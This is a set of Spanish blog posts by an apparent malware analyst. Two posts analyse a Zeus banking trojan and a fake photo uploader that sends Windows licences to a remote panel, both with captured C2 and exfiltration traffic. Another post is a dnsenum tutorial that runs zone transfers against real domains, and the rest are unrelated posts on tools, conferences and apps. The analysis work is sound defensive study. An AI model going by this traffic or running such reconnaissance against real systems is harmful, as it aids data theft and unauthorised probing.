Muy buenas a todos/as!

Existe un grupo determinado de troyanos que se dedican al Home banking, la banca electrónica. Algunos actúan como Keyloguer, capturan los datos introducidos por el usuario y estos datos son enviados a un panel web, enviados por correo etc..

Otro tipos de troyanos interactúan directamente con la Banca, solicitan los datos al usuario y, además conducen al usuario a la web legítima sin que este se percate de lo ocurrido. Este tipo de infecciones pueden venir a través de correo electrónico o pueden haber páginas webs maliciosas que contengan enlaces a software malicioso.

En este caso hay una máquina virtual con un software creado con un Builder del troyano Zeus.

Estos Builder cargan una configuración al binario, de donde ha de enviar los datos, el nombre del binario.. etc  Este software lo distribuyen mediante diferentes vías y consiguen infectar usuarios que envían los datos donde el criminal tenga un panel web esperando la recogida de información.

En la máquina Windows XP que está infectada con Zeus, el cambio en el sistema de archivos que ha echo el troyano, lo mas significativo es:

El binario se ha hecho una copia y guardado en la carpeta Datos de Programa, entre otras cosas.

En las conexiones de red, el troyano intentará conectarse con el panel de control que el criminal haya configurado con el Builder y descargarse la configuración.

GET /mm.bin HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
Host: ejemplo.ru
Cache-Control: no-cache

El troyano se descarga la configuración que analizaremos en otro artículo.

También podemos ver como envía los datos al panel

POST /panel/acc.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
Host: ejemplo.ru
Content-Length: 387
Connection: Keep-Alive
Cache-Control: no-cache

Ahora extraeremos los datos mediante strings del fichero así podemos ver algo de información del binario.

Aquí tenemos la cabecera de los strings extraídos:

!This program cannot be run in DOS mode.
Rich
UPX0
UPX1
.rsrc
3.03

Se puede ver que el troyano ha sido tratado con un packer estos packer dificultan el análisis por parte de los reversers. UPX es un compresor Open Source, pero en el caso de Malware se usa una versión modificada que dificulta la ingeniería inversa.

Seguramente el Builder lo lleva incorporado.

Hay mas cadenas interesantes que se pueden extraer del binario en cuestión:

XPTPSW
KERNEL32.DLL
advapi32.dll
user32.dll
LoadLibraryA
GetProcAddress
VirtualProtect
VirtualAlloc
VirtualFree
ExitProcess
RegCloseKey
FlashWindowEx
$/x7
6Rg)$\!
`7y5Gaz

Vaya, dll propias de sistema que interactúan con el troyano..

En el panel existen estos puertos abiertos:

22/tcp open ssh syn-ack
25/tcp open smtp syn-ack
80/tcp open http syn-ack
111/tcp open rpcbind syn-ack
427/tcp open svrloc syn-ack
631/tcp open ipp syn-ack
1720/tcp filtered H.323/Q.931 no-response
2000/tcp filtered cisco-sccp no-response
5060/tcp filtered sip no-response

En el siguiente capítulo seguiremos tratando con este troyano, espero que os haya gustado.

Saludos!!

Muy buenas a todos/as!

Por ser el informático de la familia te encuentras muchas veces con mucho malware que tienes que quitar, aunque si que es verdad los últimos ordenadores que me he encontrado no solo he limpiado el Malware si no, que, además me he quedado con el binario para jugar con él . Esta última vez se trata de un software que simula ser un uploader de fotos. Quería saber como funcionaba el Malware así que preparé mi máquina virtual y lo ejecuté a ver que pasaba.

No solo el Software no funcionaba como Uploader sino, que, además generaba cierta actividad de red.

Las peticiones DNS:

Esto ya me resultó raro, aunque tratandose de Malware.. es normal. Pero entonces observe estas peticiones

Peticiones HTTP:

Al parecer se añade un usuario a una web remota. El usuario es el nombre de mi pc, y la password la licencia de Windows. Es decir, envía a una base de datos remota mi licencia de Windows. Esto no lo había visto ahora, mola.

Quería saber como Robtex si se trataba de un sistema autónomo y había mas hosts cometiendo fraude.

Alojando en Rusia, como no !

En la página web existen diferentes directorios, entre ellos:

Este es el Software que se descarga la gente que accede por error a la URI en cuestión

De las conexiones capturadas con Wireshark se puede ver:

GET /home?action=add&username=MI%20PC&password=password&app=Windows&pcname=PERSONAL-23AB6E&sitename=Microsoft HTTP/1.1
User-Agent: HardCore Software For : Public
Host: ejemplo.com

HTTP/1.1 301 Moved Permanently
Date: Sun, 12 Feb 2012 14:24:02 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Location: http://cantportforward.com/home/?action=add&username=MI%20PC&password=password&app=Windows&pcname=PERSONAL-23AB6E&sitename=Microsoft
Content-Type: text/html
Content-Length: 413

<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF=”%s”>here</A>.<hr />
Powered By <a href=’http://www.litespeedtech.com’>LiteSpeed Web Server</a><br />
<font face=”Verdana, Arial, Helvetica” size=-1>LiteSpeed Technologies is not responsible for administration and contents of this web site!</font></body></html>
GET /home/?action=add&username=MI%20PC&password=ejemplo&app=Windows&pcname=PERSONAL-23AB6E&sitename=Microsoft HTTP/1.1
User-Agent:  Public
Host: ejemplo.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sun, 12 Feb 2012 14:24:02 GMT
Server: LiteSpeed
Connection: close
Set-Cookie: PHPSESSID=a8711e0c5081845ef1838155557b3714; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 0

En otro de los directorios,a  los que puedes acceder te encuentras con esta página:

Si se observa el código fuente, una vez loqueado puedes hacer las siguientes búsquedas:

<form name='search' method='GET' action='index.php?action=search'>
		<strong>Search for:</strong> <input type='text' name='query' size='20' value="xp"> In: <select name='in'>

		<option  value='0'>Softwares</option>
		<option  value='1'>Sitename</option>
		<option selected=selected value='2'>Username</option>
		<option  value='3'>Password</option>
		<option  value='4'>PC Name</option>
		<option  value='5'>IP Address</option>

		<option  value='6'>Date</option>
		</select>
		<input type='submit' value='Search' name='search'>
	</form>

Parece ser que se confirma mi sospecha de que es una base de datos donde se guardan ordenadores junto con sus licencias.

Para acabar, el panel será vulnerable a SQL Injection? El servidor tendrá alguna vulnerabilidad que pueda ser explotada?

En fin.. seguiremos trabajando en ello

Muy buenas a todos/as!

Hoy que estamos de Domingo, aunque el artículo no lo esté escribiendo hoy.. quiero recomendaros una de las webs que MAS me gustan, que MAS se actualizan y que MAS temática variada puedes encontrar. Siempre, siempre te sorprenden con material nuevo. Y al menos, a mi, me es imposible poder digerir bien todo lo que exponen, tutoriales que recomiendan etc.. La verdad es que en mi Reader tengo como 20 páginas por leer de ellos, de tutoriales, de cosas de Star Wars.. etc..

Os recomiendo seguir esta web si todavía NO la conocéis.. la verdad es que os dejará helados de la calidad del sitio web.

Además de en el área de seguridad siempre sorprenderte con las últimas noticias, algún que otro análisis de un CFP que hallan pasado, y suelen hacer las explicaciones de manera muy digerible para todos.

Para ir a Cyberhades podéis ir desde aquí:

Cyberhades

Muy buenas a todos/as!

Desde que entré a trabajar en el departamento de ecrime en S21Sec sabía que me acabaría tocando analizar malware. Es algo que me tenía bastante intrigado, pues pensaba que solo se basaría en hacer Ingeniería inversa. Y eso me daba pánico, porque es algo que no he echo en mi vida y ya os aseguro que viendo algún compañero de la empresa como lo realiza..da miedo… jeje.

Los primeros pasos que hice para analizar un  malware es hacer un análisis de comportamiento del mismo, esto se puede hacer por ejemplo desde una máquina virtual y con un Wireshark capturando el tráfico desde fuera, siempre y cuando el Malware en cuestión no tenga una protección de las que detecta que está siendo ejecutado en una máquina virtual. demás existen software que protegen el ejecutable los llamados packers que dificultan el análisis del binario mediante ingenría inversa, pero eso ya lo veremos mas adelante. En este blog ya he analizado algún que otro Malware viendo que conexiones hacía que ficheros de sistema cambiaba etc..

De eso se trata en parte un análisis de comportamiento de Malware. Yo para la gente que quiera empezar lo haría así:

1. Tener una máquina virtual Windows en Host-Only, preferiblemente.
2. Tener instalado InstallRite en la máquina virtual.
3. Tener capturando la actividad de la tarjeta de red con Wireshark

Estos 3 pasos básicos ya nos pueden dar una idea de que hace el malware en cuestión.

Si recordamos el artículo de analizando morto, la cantidad de conexiones que hacía el troyano, vuelvo a poner la imagen que tenía en el artículo:

Y los cambios que hacía en sistema, por ejemplo con InstallRite

Este artículo de hoy es para comentar dos cosas, la primera es que para los que quieran empezar a hacer análisis de malware no os preocupéis si no sabéis hacer ingeniería inversa, aunque os animo a que aprendáis si os vais a querer dedicar, lo segundo es que analizando como se comporta el troyano en si ya sabemos cual es su modus operandi, si el malware se actualiza, de donde etc..

Así que ánimos

Saludos

Muy buenas a todos/as!

“La información es poder”, y que razón tenía Francis BACON al decir esta frase. Cuando realizas una auditoría, siempre tenemos el primero apartado, el apartado de Fingerprinting, en el cual se comprueba entre otras cosas que información pública contiene el target objetivo.

Una de las cosas que se pueden mirar es la versión del DNS, y es por eso que existen herramientas como dnsenum que te facilitan esta tarea.

dnsenum evalúa:

1) Get the host’s addresse (A record).

2) Get the namservers (threaded).

3) Get the MX record (threaded).

4) Perform axfr queries on nameservers and get BIND versions(threaded).

5) Get extra names and subdomains via google scraping (google query = “allinurl: -www site:domain”).

6) Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).

7) Calculate C class domain network ranges and perform whois queries on them (threaded).

8) Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).

9) Write to domain_ips.txt file ip-blocks.

Nos sirve perfectamente para hacer las pruebas que necesitamos.

La herramienta la podemos descargar por SVN de aquí: dnsenum

Para hacerla funcionar hará falta que se instalen los siguiente módulos cpan:

Necesarios:
Net::IP
Net::DNS
Net::Netmask
Opcionales:
Net::Whois::IP
HTML::Parser
WWW::Mechanize
XML::Writer

Una vez tengamos los requisitos necesarios podemos empezar a usar la aplicación, pondré tres ejemplos.

Host que NO permite trasferencia de zona:

Para lanzar dnsenum

perl dnsenum.pl xubuntu.com

dnsenum.pl VERSION:1.2.2

—– xubuntu.com —–
Host’s addresses:
__________________

xubuntu.com 600 IN A 91.189.90.40
xubuntu.com 600 IN A 91.189.90.41
xubuntu.com 600 IN A 91.189.89.88
Name Servers:
______________

ns1.canonical.com 147710 IN A 91.189.94.173
ns2.canonical.com 147528 IN A 91.189.94.219
ns3.canonical.com 126351 IN A 209.6.3.210
Mail (MX) Servers:
___________________

 

Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for xubuntu.com on ns1.canonical.com …
AXFR record query failed: NOERROR

ns1.canonical.com Bind Version: 9.7.3

Trying Zone Transfer for xubuntu.com on ns3.canonical.com …
AXFR record query failed: NOERROR

ns3.canonical.com Bind Version: 9.7.3

Trying Zone Transfer for xubuntu.com on ns2.canonical.com …
AXFR record query failed: NOERROR

ns2.canonical.com Bind Version: 9.7.3
Wildcards detected, all subdomains will point to the same IP address, bye.

Podemos ver que ha conseguido extraer la información del BIND pero no permite trasferencia de Zona.

Hagamos otra comprobación:

perl dnsenum.pl gnu.org

dnsenum.pl VERSION:1.2.2

—– gnu.org —–
Host’s addresses:
__________________

gnu.org 300 IN A 140.186.70.148
Name Servers:
______________

ns2.gnu.org 300 IN A 87.98.253.102
ns1.gnu.org 300 IN A 140.186.70.164
ns3.gnu.org 300 IN A 46.43.37.70
Mail (MX) Servers:
___________________

eggs.gnu.org 300 IN A 140.186.70.92
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for gnu.org on ns2.gnu.org …
gnu.org 300 IN SOA
gnu.org 300 IN A 140.186.70.148
gnu.org 300 IN TXT
gnu.org 300 IN MX
gnu.org 300 IN NS
gnu.org 300 IN NS
gnu.org 300 IN NS
gnu.org 300 IN SSHFP
alpha.gnu.org 300 IN A 140.186.70.21
anoncvs.gnu.org 300 IN CNAME
arch.gnu.org 300 IN CNAME
audio-video.gnu.org 300 IN CNAME
audio-video-dev.gnu.org 300 IN A 140.186.70.157
audio-video-dev.gnu.org 300 IN SSHFP
autoconfig.gnu.org 300 IN A 140.186.70.30
be.gnu.org 300 IN NS
be.gnu.org 300 IN NS
ftp.be.gnu.org 300 IN CNAME
www.be.gnu.org 300 IN CNAME
beeblebrox.gnu.org 300 IN SSHFP
bugs.gnu.org 300 IN A 140.186.70.43
bzr.gnu.org 300 IN CNAME
catalyst.gnu.org 300 IN SSHFP
chapters.gnu.org 300 IN A 91.121.254.230
front.chapters.gnu.org 300 IN A 91.121.254.230
clock.gnu.org 300 IN CNAME
www.cn.gnu.org 300 IN A 61.152.210.194
cvs.gnu.org 300 IN CNAME
dbd.gnu.org 300 IN A 140.186.70.32
dbd.gnu.org 300 IN SSHFP
debbugs.gnu.org 300 IN A 140.186.70.43
debbugs.gnu.org 300 IN SSHFP
eggs.gnu.org 300 IN A 140.186.70.92
eggs.gnu.org 300 IN SSHFP
elpa.gnu.org 300 IN A 140.186.70.89
elpa.gnu.org 300 IN SSHFP
es.gnu.org 300 IN MX
es.gnu.org 300 IN A 91.121.254.230
bee.es.gnu.org 300 IN CNAME
www.bee.es.gnu.org 300 IN CNAME
bluewall.es.gnu.org 300 IN CNAME
bussiness.es.gnu.org 300 IN CNAME
bw.es.gnu.org 300 IN CNAME
conferencias.es.gnu.org 300 IN CNAME
emacs.es.gnu.org 300 IN CNAME
www.emacs.es.gnu.org 300 IN CNAME
empresas.es.gnu.org 300 IN CNAME
evalhackers.es.gnu.org 300 IN CNAME
ftp.es.gnu.org 300 IN CNAME
ghm.es.gnu.org 300 IN CNAME

[...]

Podemos ver que el dominio de GNU.org permite trasferencia de zona en el DNS.

En algún DNS también nos dejan mensajes de los mas curiosos:

perl dnsenum aeat.es

—– aeat.es —–
Host’s addresses:
__________________

aeat.es 3176 IN A 195.235.106.193
Name Servers:
______________

esifw2.tsai.es 106 IN A 213.4.194.5
esifw1.tsai.es 256 IN A 213.0.43.37
Mail (MX) Servers:
___________________

correodeempresas.telefonica.es 300 IN A 212.170.236.87
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
Trying Zone Transfer for aeat.es on esifw1.tsai.es …
AXFR record query failed: NOERROR

esifw1.tsai.es Bind Version: :-b

Parece ser que no quieren que miremos la versión

Si queréis analizar un DNS de manera automática esta herramienta os puede ayudar.

Saludos!

Muy buenas a todos/as!

A gustos colores, y esto, ¿porque lo digo? Porque cada uno se encuentra cómodo con su sistema operativo. Hay una frase que siempre comenta en los podcast el crack de Dabo (desde aquí te mando un saludo) que dice que hace tiempo que dejó la guerra de sistemas.

La verdad es que es imposible afirmar “este es el sistema operativo de trabajo perfecto” y por mi parte me siento muy cómodo trabajando con MAC, con Windows o con Linux. De hecho mientras me leía el libro de Sergio de los Santos sobre Máxima Seguridad en Windows, decidí formatear mi máquina y configurarla haciendo uso de las buenas prácticas que comenta Sergio en su libro.

También hubo una temporada que tenía los 3 sistemas operativos instalados para trabajar todo gestionado con grub haciendo uso de un triple boot. Estaba muy bien pero era muy incómodo para trabajar.

Finalmente y haciendo caso de un colega me he instalado Xubuntu, es decir Ubuntu con el entorno de escritorio de XFCE, y la verdad es que estoy muy, pero que muy contento con el resultado siempre había sido fiel a Ubuntu, la distribución que ahora viene con el puto Unity. Pero al probar esta versión de Ubuntu el resultado, me ha gustado mucho. Lo malo de trabajar en empresa con un sistema GNU/LINUX son varios el mas importante son la entrega de informes que al estar hechos con Microsoft Word cuando los abres con Libre Office el resultado  en fin… Y el hecho de migrarlas todavía no me lo he planteado así que al final has de acabar tirando de máquina virtual para poder hacer algunas cosas. En mi caso y eso que soy vmware-adicto he optado por Virtualbox. Es bastante ligero y de momento me está aportando los resultados que deseo.

En cuanto a Xubuntu aún no he personalizado el sistema tan solo me he instalado algunos módulos de perl que necesito y algunas herramientas para mi trabajo diario. Eso si, no puedo dejar de recomendar para trabajar Synapse. Es una herramienta que mediante control + espacio te permite poder lanzar aplicaciones además de hacer búsquedas muy rápidas en tu sistema. Aprende de las aplicaciones que mas usas además de poder discernir que quieres buscar y que no, es decir, puedes quitar cosas del índice de búsqueda.

Con la terminal + VIM ya puedo hacer muchas cosas, y si tengo alguna cosas que he echo ha faltar del Sistema Windows sobretodo en temas de herramientas siempre puedo tirar de máquina virtual.

En mi casa uso MAC con el Macbook que me reagalaron la verdad es que estoy enamorado del sistema operativo y de la funcionalidad, aunque algunos la critiquen y otros digan que es muy inseguro (que raźon no les falta)

En fin, la conclusión al final, es que no hay un sistema operativo mejor que otro y que uses el que más cómodo te sientas.

Saludos!

Muy buenas a todos/as!

Si! Por fin este año podré acceder a las conferencias RootedCON que se celebran en Madrid en 2012.

El primer año, me fue imposible venir, en el segundo compré la entrada pero por temas de trabajo me fue del todo imposible el poder asistir.. la verdad es que me quedé a las puertas además de sin el dinero X).

Pero este año junto con compañeros de la empresa estaremos disfrutando de las jornadas de de la RootedCON que además como cada año las ponencias y ponentes destacan por su calidad.

Las ponencias están confirmadas y la agenda ya está expuesta en la web de la RootedCON

Agenda de la RootedCON

Además estas conferencias sirven para reencontrarse con viejos amigos, como por ejemplo el caso de Lorenzo Martinez este crack editor del blog de Security by Default y que además hace poco estuvo en Mundo Hacker os recomiendo ver el video

Análisis forense informático

Tampoco me olvido de Chemita Alonso, el Maligno que junto Manu, The Sur! Es una de las charlas que MAS me interesa. También contarán con Yago Jesús otro de los editores del blog de Security by Default

Tampoco me olvido de Pedro Sánchez que no pudo dar su charla en la edición pasada, por problemas y como no, mi compañeros Jose Miguel Esparza y Mikel Gastesi que darán una charla de lo que mas saben!

Os copio y pego la agena de la RootedCON:

Y hasta aquí el tema de las conferencias, espero veros por la RootedCON

Muy buenas a todos/as!

Pues como bien dice el título de este artículo no encuentro tiempo para hacer nada, en realidad es bueno ya que la curva de aprendizaje adquirida con el trabajo esta siendo elevada, pero la verdad a veces desearía tener tiempo para mas cosas.

Tengo varios artículos en borrador alguna entrevista, algún sorteo etc.. Espero poder sacar hacia adelante esto y no dejarlo muerto, que ya me están mandando correos de que esto no lo deje así que ya están esperando actualizaciones. Así que como al final me debo a mis lectores :p.

He vuelto a cambiar el diseño del blog, he añadido un buscador a la derecha arriba, que se e habían quejado de que no había puesto buscador.

Abajo he añadido un calendario, las estadísticas de Askimet, los artículos que mas se han visitado, creo que al final ha quedado bastante bonito

Iréis teniendo mas noticias mías

Muy buenas a todos/as!

Desde que me compré el Nexus One mucha de la gente que ya tenía Android me había pedido que pusiese que aplicaciones había usado o que me parecían interesantes.

Es algo que he ido retrasando pues al final te quedas con aquellas aplicaciones que mas te sirven y de echo he probado muchas, pero o saturas el teléfono o te acabas volviendo un poco loco de la cantidad que hay. Cabe decir que pondré tanto aplicaciones que necesiten root como las que no, dando por echo que se tiene el telefono rooteado.

Lo primero para empezar es tener rooteado el teléfono en mi caso, por ejemplo, yo usé Cyanogenmod en su última versión, una vez instalado, se empieza con las aplicaciones.

La primera es Titanium Backup

Este software es capaz de hacerte la vida mucho más fácil, para empezar, te permite mover mediante lotes (scripts programados) la ejecución de tareas como, mover todas las aplicaciones que lo permiten a la SD. Además de hacer backups automáticos, permite incluso que lo puedas sincornizar con el Dropbox, una maravilla sin duda

Kaspersky

El tema de tener antivirus en Android creo, ya no se puede discutir, de echo las predicciones para el 2012 es que el malware en Android aumente un 6000 %, así que por si acaso es mejor estar protegido. Este software te permite incluso mediante la recepción de SMS ejecutar acciones sobre el dispositivo, como un auto-wipe por ejemplo.

TMB

Esto solo si vivis en Barcelona y viajáis en transporte público os servirá para saber cuanto tarda el próximo autobús en venir. Para mi imprescindible!

Dolphin Browser

El tema del navegador es algo que es bastante importante pues se necesita un navegador que sea rápido que puedas configurar medida y ese es el caso de Dlphin Browser. Con Dolphin podemos agregar complementos usar gestos para realizar ciertas acciones etc…

Dropbox

No hace falta que os hable sobre esta aplicación ya.. es bastante usada para compartir archivos entre pc, movil, ipad, linux de lo que necesites la cuenta gratuita tiene hasta 2GB de almacenamiento gratuito.

Hasta aquí mi primera pequeña lista de aplicaciones, mañana mas y mejor 

Saludos

Muy buenas a todos/as!

Intentaré los Domingos por cambiar un poco el asunto poner alguna recomendación de páginas/proyectos/libros que esté leyendo  actualmente o bien que sean de mi interés.

En el artículo de hoy tráigo uno de los libros que mas me ha gustado de carácter técnico. El libro es “Máxima Seguridad en Windows” el libro editado por Informática64 y escrito por el GRAN Sergio de los Santos cubre aquellas necesidades que la gente necesita sobre securizar su Windows.

Sergio tiene mucha experiencia con malware y con sistemas Windows, es un crack y lo puedes obervar en charlas a las que he podido verle como por ejemplo en el Asegura IT Camp 3 donde dió una charla en la que pude ver en directo el pedazo de profesional que es.

Y respecto al libro obervando el índice que ya vi en el Asegura IT Camp 3 me entraron muchas ganas de leerlo. El índice lo podemos ver aquí.

Cuando empecé la lectura del libro tenía muy claro que acabaría aplicando fuego purificador a mi instalación de Windows es decir, formateando la instalación actual y volver a instalar Windows 7 y configurarlo de manera seguro. Ya he retocado cosas del registro, cambiado el UAC configurado el firewall desde cero… he aprendido muchas cosas internas de Windows y que NO conocía, pero que de momento puedo ir tranquilo sion antivirus porque yo se que aplicaciones hacen cada cosa en mi sistema operativo.

Desde luego una lectura recomendada.

Podéis adiquirir el libro aquí

Así que ya sabéis haced vuestro pedido

Saludos